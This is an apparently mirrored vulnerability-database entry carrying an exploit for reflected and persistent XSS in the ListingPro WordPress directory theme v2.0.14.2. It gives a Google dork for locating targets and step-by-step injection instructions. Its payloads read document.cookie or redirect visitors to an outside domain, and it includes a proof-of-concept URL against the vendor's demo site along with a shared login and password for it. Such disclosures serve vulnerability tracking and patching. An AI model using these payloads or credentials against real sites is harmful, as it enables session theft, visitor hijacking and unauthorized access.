ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1840282 漏洞类型
发布时间 2019-11-29 更新时间 2019-11-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110175
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: ListingPro - WordPress Directory Theme v2.0.14.2 Reflected & Persistent XSS
# Google Dork: /wp-content/themes/listingpro/
# Date: 29/11/2019
# Exploit Author: SUBVΞRSΛ
# Vendor Homepage: https://listingprowp.com/beta/
# Software Link: https://themeforest.net/item/listingpro-multipurpose-directory-theme/19386460
# Version: 2.0.14.2 [ 12.563 Sales ]
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Reflected XSS: -[]----
Use your payload inside the «What» input field on the homepage ( https://classic.listingprowp.com/ ) and then submit the form — payload will be triggered.

Payload Sample #0: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">
Payload Sample #1: "><img src=x onerror=alert(`SUBVΞRSΛ`)>

PoC Link: https://classic.listingprowp.com/?select=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60SUBV%CE%9ERS%CE%9B%60%29%3E&lp_s_loc=&lp_s_tag=&lp_s_cat=&s=home&post_type=listing


----[]- Persistent XSS: -[]----
You need a new basic user account (register your own or use mine: kadajik5554913/hYWeOJdr5Mqe), then go to the https://classic.listingprowp.com/submit-listing/ page for new listing submit. Choose the «Free» plan and press «Continue» button. On the next page you need to choose any category and after that you'll see the vulnerable input fields: «Best Day/Night» and «Good For» (for some categories you'll see only one vulnerable input field — «Good For»). Use your payload inside vulnerable input field(-s) and save your listing.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><img src=x onerror=window.location.replace(`http://defcon.su`)>

PoC: log in as kadajik5554913/hYWeOJdr5Mqe (login/password) and go to the https://classic.listingprowp.com/?post_type=listing&p=18417 page.